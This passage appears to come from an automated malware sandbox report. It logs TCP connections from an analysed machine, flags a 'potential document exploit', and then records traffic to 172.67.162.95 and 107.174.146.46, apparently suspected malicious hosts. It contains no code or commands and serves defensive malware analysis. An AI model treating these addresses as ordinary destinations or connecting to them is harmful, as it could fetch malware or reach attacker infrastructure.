Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
